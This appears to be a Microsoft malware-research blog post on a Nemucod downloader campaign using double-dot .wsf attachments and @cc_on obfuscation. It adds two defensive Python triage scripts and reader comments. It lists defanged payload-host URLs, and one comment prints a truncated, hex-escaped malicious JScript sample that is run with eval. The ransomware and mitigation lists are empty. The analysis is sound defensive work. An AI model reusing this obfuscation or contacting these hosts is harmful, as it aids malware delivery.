Nemucod dot dot..WSF


The latest Nemucod campaign distributes its spam email attachment with a .wsf extension, specifically a ..wsf (double-dot) extension.

It is a variation of what has been observed since last year (2015): the TrojanDownloader:JS/Nemucod downloader, written in JScript. It still spreads through spam email attachments, typically inside a .zip file, using a file name of interest with a .js or .jse extension.

The following screenshots show what the malicious file attachment looks like in the recent campaign:

Figure 1: Example of how an email spam containing the latest version of Nemucod might look like

Figure 2: Example of how Nemucod malware looks like when extracted and opened with an archive viewer

What the double dots mean: Social engineering for unsuspecting eyes

As seen in the following sample file names, the double dot paired with the uncommon .wsf extension creates the illusion that the file name was abbreviated, intentionally truncated, or shortened by the system because it was too long:

  • profile-d39a..wsf
  • profile-e3de..wsf
  • profile-e7dc..wsf
  • profile-f8d..wsf
  • profile-fb50..wsf
  • spreadsheet_07a..wsf
  • spreadsheet_1529..wsf
  • spreadsheet_2c3b..wsf
  • spreadsheet_36ff..wsf
  • spreadsheet_3a8..wsf

Some might look at the sample file names and assume that they were originally a long unique identifier of random letters and digits, such as a transaction ID, receipt number or even a user ID:

  • profile-d39as1u3e8k9i3m4wsf
  • profile-e3dee1uwl8s10f3m4wsf
  • profile-e7dc4d1u3e83m4wsf
  • profile-f8dsdwsfe8k4i38wsf
  • profile-fb50s1u3l8k9i3m4wsf
  • spreadsheet_07as133e3k9i3e4wsf
  • spreadsheet_1529s15se8f9i3o6wsf
  • spreadsheet_2c3bs1u5dfk9i3m6wsf
  • spreadsheet_36ffs1ure8koei3d5ws
  • spreadsheet_3a8s1udwsf8s9i323wsf

However, this is not the case. These are script files: Windows Script Host runs whatever comes after the last dot, and the code they contain can harm your system.
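A name-based check for the lures described in this section, added here as an example (not code from the original post): it flags a script extension that Windows Script Host will run, an empty segment right before it (the double dot) and a decoy document extension in front of it, and it applies the same check to the member names of a zip attachment without extracting anything. The archive it scans is constructed inline, and the two extension sets are assumptions chosen for illustration.

```python
"""Flag attachment names that use the tricks described above: a script extension
Windows Script Host will run, a double dot before it (profile-d39a..wsf) and a
decoy document extension in front of it (invoice.pdf.js). Added example, not code
from the original post; the archive it scans is constructed here."""
from __future__ import annotations

import io
import zipfile

# Extensions that Windows hands to Windows Script Host / mshta when double-clicked
# (assumed set, chosen for illustration).
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta"}
# Document/image extensions a user expects to be harmless; a script extension
# right after one of these is the classic double-extension lure (assumed set).
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png", "zip"}


def classify_attachment(name: str) -> list[str]:
    """Return the lure patterns found in one file name (empty list if none).

    Windows picks the handler from the text after the LAST dot, so the check is
    made on that segment regardless of what the rest of the name looks like.
    """
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    flags: list[str] = []
    if len(parts) < 2 or parts[-1] not in SCRIPT_EXTS:
        return flags
    flags.append("script-extension:" + parts[-1])
    penultimate = parts[-2] if len(parts) >= 3 else None
    if penultimate == "":
        # "spreadsheet_07a..wsf": the empty segment is the second dot
        flags.append("double-dot")
    elif penultimate in DECOY_EXTS:
        # "invoice.pdf.js": the decoy extension is what the eye reads
        flags.append("double-extension:" + penultimate)
    return flags


def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Classify every member name of a zip attachment without extracting it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: classify_attachment(info.filename)
                for info in zf.infolist() if not info.is_dir()}


def build_sample_zip() -> bytes:
    """Constructed stand-in for the spam attachment: one ..wsf plus a benign file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("spreadsheet_07a..wsf",
                    '<job><script language="JScript">WScript.Echo(1);</script></job>')
        zf.writestr("readme.txt", "nothing to see here")
    return buf.getvalue()


SAMPLE_ZIP = build_sample_zip()

if __name__ == "__main__":
    for name in ("profile-d39a..wsf", "invoice.pdf.js", "report.pdf"):
        print(f"{name:24s} {classify_attachment(name)}")
    for member, flags in scan_zip(SAMPLE_ZIP).items():
        print(f"zip member {member:24s} {flags}")
```

Running the block prints the flags for the three names and for both archive members; only the ..wsf member is flagged. Because the handler is chosen from the last extension, a name such as report..pdf (no script extension) is correctly left alone.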

Underneath the WSF

A Windows Script File (.wsf) is a text file containing XML. It offers increased scripting flexibility because it is not tied to one script language: each <script> element declares its language, so the underlying code can be JScript (Microsoft's JavaScript implementation) or VBScript. The WSF acts as a container; Windows Script Host runs it.

Underneath the WSF is the same typical Nemucod JScript code.

Figure 3: Nemucod code inside WSF: has encrypted code and the decryption is written under @cc_on (conditional compilation)

This Nemucod version leverages the @cc_on (conditional compilation) directive. JScript conditional compilation statements are written inside a comment (/*@cc_on ... @*/): a scanner or parser that does not implement JScript conditional compilation sees only a comment and never examines the decryption routine as code, while the JScript engine in Windows Script Host compiles and runs it. This can let the sample evade AV scanners that rely on such parsing.

Decrypting the code reveals the URLs where the malware payload is hosted:

  • hxxp://right-livelihoods.org/rpvch
  • hxxp://nmfabb.com/rgrna1gc
  • hxxp://www.fabricemontoyo.com/v8li8
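The following Python script, added here and not part of the original post, does statically what the description above says a naive scanner fails to do: it pulls the <script> bodies out of the WSF container, exposes the code sitting inside /*@cc_on ... @*/ comments, decodes the hex-escaped string literals that build the next stage, and lists the URLs found in the result. The WSF it analyzes is constructed inline with placeholder example.invalid URLs, and the assumption that the decoded literals, concatenated in source order, form the next stage matches the ('\x..' + '\x..').split('').join('') then eval() pattern these loaders use.

```python
"""Triage a Windows Script File: list the <script> bodies, expose JScript hidden in
conditional-compilation comments, decode hex-escaped string literals and pull the
URLs out of the decoded stage. Added example, not code from the original post;
the WSF it analyzes is constructed below with placeholder URLs."""
from __future__ import annotations

import re

# <script language="JScript"> ... </script>. WSF is an XML container, but real
# samples are often not well-formed XML, so a tolerant regex is used instead of
# an XML parser.
SCRIPT_RE = re.compile(
    r"<script\b[^>]*\blanguage\s*=\s*[\"']?([A-Za-z]+)[\"']?[^>]*>(.*?)</script>",
    re.I | re.S)
# JScript conditional compilation: /*@ ... @*/ is a plain comment to anything
# that is not the JScript engine; JScript compiles and runs it once @cc_on is seen.
CC_RE = re.compile(r"/\*@(.*?)@\*/", re.S)
# Single- or double-quoted JS string literal, escapes allowed inside.
LITERAL_RE = re.compile(r"'((?:\\.|[^'\\])*)'|\"((?:\\.|[^\"\\])*)\"", re.S)
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})|\\(.)", re.S)
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.I)
SIMPLE_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f", "v": "\v", "0": "\0"}


def scripts(wsf: str) -> list[tuple[str, str]]:
    """(language, body) for each <script> element in the container."""
    return [(m.group(1).lower(), m.group(2)) for m in SCRIPT_RE.finditer(wsf)]


def hidden_code(body: str) -> list[str]:
    """Code inside /*@ ... @*/ comments, with the leading cc_on directive removed."""
    return [re.sub(r"^\s*cc_on\b", "", m.group(1), count=1).strip()
            for m in CC_RE.finditer(body)]


def decode_literal(raw: str) -> str:
    """Resolve \\xNN, \\uNNNN and single-character escapes in a JS literal body."""
    def repl(m: re.Match) -> str:
        if m.group(1) or m.group(2):
            return chr(int(m.group(1) or m.group(2), 16))
        return SIMPLE_ESCAPES.get(m.group(3), m.group(3))
    return ESCAPE_RE.sub(repl, raw)


def rebuild_stage(code: str) -> str:
    """Decode and concatenate every string literal in source order.

    Assumption: the loader builds the next stage as ('\\x76..' + '\\x61..')
    .split('').join('') and eval()s it, so the literals, in order, ARE that stage.
    """
    return "".join(decode_literal(m.group(1) if m.group(1) is not None else m.group(2))
                   for m in LITERAL_RE.finditer(code))


def analyze(wsf: str) -> dict:
    """Static report: languages used, hidden blocks found, decoded stage, URLs."""
    report: dict = {"languages": [], "hidden_blocks": 0, "stage2": "", "urls": []}
    for lang, body in scripts(wsf):
        report["languages"].append(lang)
        if lang != "jscript":
            continue
        for block in hidden_code(body):
            report["hidden_blocks"] += 1
            stage2 = rebuild_stage(block)
            report["stage2"] += stage2
            report["urls"].extend(URL_RE.findall(stage2))
    return report


# ---- constructed sample, not a real campaign file --------------------------
STAGE2 = ('var urls = ["http://example.invalid/a1b2", "http://example.invalid/c3d4"];\r\n'
          'var sh = new ActiveXObject("WScript.Shell");\r\n'
          '// download-and-run loop would follow here\r\n')


def hex_escape(text: str, chunk: int = 24) -> str:
    """Encode text as '+'-joined JScript literals made of \\xNN escapes."""
    esc = "".join("\\x%02x" % ord(c) for c in text)
    pieces = [esc[i:i + chunk * 4] for i in range(0, len(esc), chunk * 4)]
    return " +\n".join("'%s'" % p for p in pieces)


SAMPLE_WSF = f"""<job id="job1">
<script language="JScript">
var visible = 1; // harmless-looking code outside the comment
/*@cc_on
var s = ({hex_escape(STAGE2)}).split('').join('');
var e = s;
eval(e);
@*/
</script>
</job>
"""

if __name__ == "__main__":
    rep = analyze(SAMPLE_WSF)
    print(rep["languages"], rep["hidden_blocks"], "hidden block(s)")
    print(rep["stage2"])
    print("URLs:", rep["urls"])
```

The script never evaluates anything: the stage is rebuilt by decoding literals, which is enough to recover the download URLs for blocking or hunting. Anything a real sample does beyond plain concatenation (arithmetic on characters, a key schedule) would need the decoding step adapted, which is why rebuild_stage is kept separate from the extraction logic.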

Recent spam campaign and trends

The latest Nemucod telemetry for the past 15 days shows that it has been constantly active, although there haven't been any huge spikes.

Figure 4: Daily detection trend for Nemucod. These are the unique machine encounters per day

Figure 5: Geographic distribution of Nemucod. Data taken from July 3 to July 18, 2016

Other than the ..wsf and @cc_on techniques, we've also seen different and old tricks used as part of its social engineering. These include, but are not limited to:

  • Double extension (for example: <filename>.pdf.js, where the .pdf part is a decoy and the file is run as JScript)
  • Invoice, receipt, and delivery related file names such as DHL, FedEx delivery, and so forth

Nemucod infection chain

Nemucod infection chain showing spam email distributing WSF which downloads and runs malware

Just like the Nemucod campaigns before this, the payload fetched by the downloader includes ransomware, such as:

Mitigation and prevention

To avoid falling prey to this new Nemucod malware campaign:

Francis Tan Seng and Alden Pornasdoro
MMPC

Comments (8)

  1. adwbust says:

    that’s why js file extension should also get zone identifier!

    mmpc engine so weak against PUA installcore and html/phish!

    1. Alfred E. Neumann says:

      1. it’s the task of the mail client, web browser etc. to create the zone identifier;
      2. Internet Explorer, Outlook, Outlook Express, Windows (Live) Mail all add the zone identifier.

  2. John S. Kent says:

    Defender:
    Client Version: 6.1.7600.16385
    Engine Version: 1.1.12902.0
    Antispyware definitions: 1.225.2406.0

    var aQHe5 = ('\x76\x61\x72\x20Fr\x20\x3d\x20"\x6f\x73\x65\x22\x20\x2b\x20\x22\x22\x3b\x0d'+
    '\x0a\x76a\x72\x20\x4e\x59f\x35\x20=\x20\x22c\x6c"\x20\x2b \x22\x22'+
    ';\x0d\x0a\x76\x61\x72\x20\x59\x67\x31\x20\x3d\x20\x22\x6c\x65\x22\x20\x2b\x20"'+

    … Removed due to space restrictions …

    '\x28\x41\x62\x28\x5a\x4c\x72\x39\x29\x29\x3b\x0d\x0a\x20 \x20\x20\x4bJ\x70['+
    '\x52c4\x20\x2b\x20\x4a\x73\x20\x2b\x20U\x69\x39\x5d\x28Y\x61\x36\x2c\x20'+
    '\x32\x29;\x0d\x0a\x0d\x0a\x20\x20 \x20\x4b\x4a\x70\x5b\x44\x44\x67\x28\x44\x50'+
    'v1\x29\x20+ I\x4a\x672 + X\x41\x65\x33]\x28\x29\x3b'+
    '\x0d\x0a\x7d;').split('').join('');
    var Um7 = aQHe5;

    eval(Um7);

    Above File: annual_report_~1FE1~..Wsf

    NOT REPORTED BY Defender EITHER IN “Quick” or “Full” SCAN!!!!!!!

    annual_report_~1FE1~..Wsf Defender Failure to Recognize Threat.Txt

    3d Post & https://blogs.technet.microsoft.com/mmpc/2016/07/23/nemucod/
    Shows NO COMMENT! You Are CENSORING Posts to Your Benefit!

    1. msft-mmpc says:

      Hi John S. Kent, please see our About us page (https://blogs.technet.microsoft.com/mmpc/about/) for our blog comment moderation process. Sometimes there can be a delay before we can moderate and post comments. For this particular file, you can submit it to us by following the instructions at http://aka.ms/submitfile.

  3. Andrew says:

    How do you add .wsf to AppLocker? As far as I can tell you can't add additional extensions.

    1. volkan says:

      How can we add .wsf to the file types to block in your AppLocker Group Policy?

  4. lee says:

    I found this as a javascript file in a gibberish-named .zip archive.

  5. volkan says:

    How can we add .wsf to the file types to block in your AppLocker Group Policy?
